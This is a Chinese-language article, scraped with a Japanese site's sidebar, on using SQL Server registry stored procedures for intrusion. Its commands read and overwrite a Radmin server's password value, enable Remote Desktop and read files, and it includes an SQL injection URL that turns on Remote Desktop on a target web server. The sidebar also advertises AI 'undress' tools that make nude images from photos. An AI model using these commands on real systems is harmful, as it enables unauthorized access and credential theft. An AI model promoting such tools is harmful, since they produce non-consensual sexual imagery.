几个扩展存储过程使用方法
sqlserver里面有一些危险的扩展存储过程,可以操作注册表,所以很多情况下,下面的存储过程为了服务器安全都会将这些存储过程删除。不过防御与安全同等重要。下面是具体的注册的操作方法。
SQL Server中包含了几个可以访问系统的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了,在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统的能力,
而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们.
xp_regenumvalues 以多个记录集方式返回所有键值
使用方法:
xp_regenumvalues 根键, 子键
比如说,想看看HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 的所有键值:
use master
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
xp_regread 返回制定键的值
使用方法:
xp_regread 根键,子键,键值名
use master
exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
得到密码
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'
远程桌面开启为0
xp_regwrite 写入
使用方法:
xp_regwrite 根键,子键, 值名, 值类型, 值
use master
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0xD7B7CB315B4E731D8E9EF886CE6DCB23;--
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY','';--
必须清空后再写新数值
修改成功的前提是值为空
注意值类型有2种REG_SZ 表示字符型,相当于新建字符串值,REG_DWORD 表示整型,相当于新建DWORD值
REG_BINARY
exec xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',1;--
禁用远程桌面
xp_regdeletevalue 删除某个值
使用方法:
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'
use master
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter'
xp_regdeletekey 删除键,包括该键下所有值
使用方法:
use master
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'
exec xp_regdeletekey 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters'
运行前提SA
可能用处不是很大,也没深入研究,因为觉得读asp用xp_makecab更方便点,仅供思维扩展。
方法1.bulk insert aaa FROM 'c:\1.txt'
方法2.xp_readerrorlog 1,'c:\1.txt'
开启远程桌面http://192.168.200.188/product_list.asp?classid=14;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWord',0;--
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
AI Hentai Generator
AIヘンタイを無料で生成します。
人気の記事
ホットツール
メモ帳++7.3.1
使いやすく無料のコードエディター
SublimeText3 中国語版
中国語版、とても使いやすい
ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境
ドリームウィーバー CS6
ビジュアル Web 開発ツール
SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)
ホットトピック
7480
15
1377
52
77
11
19
33
最初から最後まで: PHP 拡張機能 cURL を使用して HTTP リクエストを行う方法
Jul 29, 2023 pm 05:07 PM
最初から最後まで: HTTP リクエストに php 拡張機能 cURL を使用する方法 はじめに: Web 開発では、多くの場合、サードパーティ API または他のリモート サーバーと通信する必要があります。 cURL を使用して HTTP リクエストを行うのは、一般的で強力な方法です。この記事では、PHP を使用して cURL を拡張して HTTP リクエストを実行する方法を紹介し、いくつかの実用的なコード例を示します。 1. 準備 まず、php に cURL 拡張機能がインストールされていることを確認します。コマンドラインで php-m|grepcurl を実行して確認できます。
PHP 関数の拡張機能とサードパーティ モジュール
Apr 13, 2024 pm 02:12 PM
PHP 関数の機能を拡張するには、拡張機能とサードパーティのモジュールを使用できます。拡張機能は、pecl パッケージ マネージャーを通じてインストールおよび有効化できる追加の関数とクラスを提供します。サードパーティ モジュールは特定の機能を提供し、Composer パッケージ マネージャーを通じてインストールできます。実際の例には、拡張機能を使用して複雑な JSON データを解析したり、モジュールを使用してデータを検証したりすることが含まれます。
Oracle ストアド プロシージャを使用してバッチ更新を実装する手順と注意事項
Mar 08, 2024 pm 04:12 PM
タイトル: Oracle ストアド プロシージャによるバッチ更新を実装するための手順と注意事項 Oracle データベースでは、ストアド プロシージャは、データベースのパフォーマンスの向上、コードの再利用、およびセキュリティの強化を目的に設計された一連の SQL ステートメントです。ストアド プロシージャを使用して、データをバッチで更新できます。この記事では、Oracle ストアド プロシージャを使用してバッチ更新を実装する方法を紹介し、具体的なコード例を示します。ステップ 1: ストアド プロシージャを作成する まず、バッチ更新操作を実装するストアド プロシージャを作成する必要があります。ストアドプロシージャの作成方法は次のとおりです。
CENTOS7でmbstring拡張機能をインストールするにはどうすればよいですか?
Jan 06, 2024 pm 09:59 PM
1.UncaughtError:Calltoundependentfunctionmb_strlen(); 上記のエラーが発生した場合、mbstring 拡張機能がインストールされていないことを意味します; 2. PHP インストール ディレクトリ cd/temp001/php-7.1.0/ext/mbstring に入ります 3. phpize( /usr/local/bin /phpize または /usr/local/php7-abel001/bin/phpize) コマンドを使用して、php 拡張機能 4../configure--with-php-config=/usr/local/php7-abel をインストールします。
MySQLでストアドプロシージャを削除する方法
Sep 05, 2023 am 10:25 AM
MySQL でストアド プロシージャを削除する方法には、DROP PROCEDURE ステートメントの使用、MySQL Workbench の使用、コマンド ライン ツールの使用などがあります。詳細な紹介: 1. DROP PROCEDURE ステートメントを使用します。手順としては、まず MySQL クライアントを開くか、MySQL をサポートするツールを使用し、次に MySQL データベースに接続し、最後に次の SQL ステートメントを実行してストアド プロシージャを削除します。 MySQL Workbench を使用してストアド プロシージャなどを削除します。
Oracleストアドプロシージャ:テーブルが存在するかどうかを判定する実装方法
Mar 08, 2024 pm 09:18 PM
Oracle データベースのストアド プロシージャは、データベース内で一連の SQL ステートメントとデータ操作を実行するために使用される特定のタイプのストアド プロシージャです。実際のデータベース開発作業では、格納プロセスで何らかの判断や論理処理を行うために、データベース内に特定のテーブルが存在するかどうかを判断する必要があることがあります。以下では、Oracle データベースにテーブルが存在するかどうかを判断するメソッドの実装方法と、具体的なコード例を紹介します。まず、システム テーブル user_tables または all_t を使用できます。
Golang ストアド プロシージャの実装原則とアプリケーション
Feb 22, 2024 pm 04:57 PM
Golang ストアド プロシージャの実装原理とアプリケーション ストアド プロシージャは、リレーショナル データベースに保存され、アプリケーションから呼び出すことができるプリコンパイルされたプログラムであり、データのネットワーク送信コストを効果的に削減し、データベースの実行効率を向上させることができます。 Golang はストアド プロシージャを直接サポートしていませんが、SQL ステートメントを使用してストアド プロシージャの機能をシミュレートできます。この記事では、Golang でストアド プロシージャを実装する原則と応用を紹介し、具体的なコード例を示します。 1. Golangストアドプロシージャの実装原理はGolにある
C# を使用して MySQL でカスタム ストアド プロシージャと関数を作成する方法
Sep 22, 2023 am 09:42 AM
C# を使用して MySQL でカスタム ストアド プロシージャと関数を作成する方法 はじめに: MySQL は広く使用されているオープン ソース データベース管理システムであり、C# は一般的に使用されているオブジェクト指向プログラミング言語です。開発プロセスでは、コードの再利用性とパフォーマンスを向上させるために、データベースのストアド プロシージャや関数を使用する必要がよくあります。この記事では、C# を使用して MySQL データベースにカスタム ストアド プロシージャと関数を作成する方法を紹介し、具体的なコード例を示します。 1. ストアド プロシージャ ストアド プロシージャは、特定のタスクを実行する一連の SQL ステートメントです。
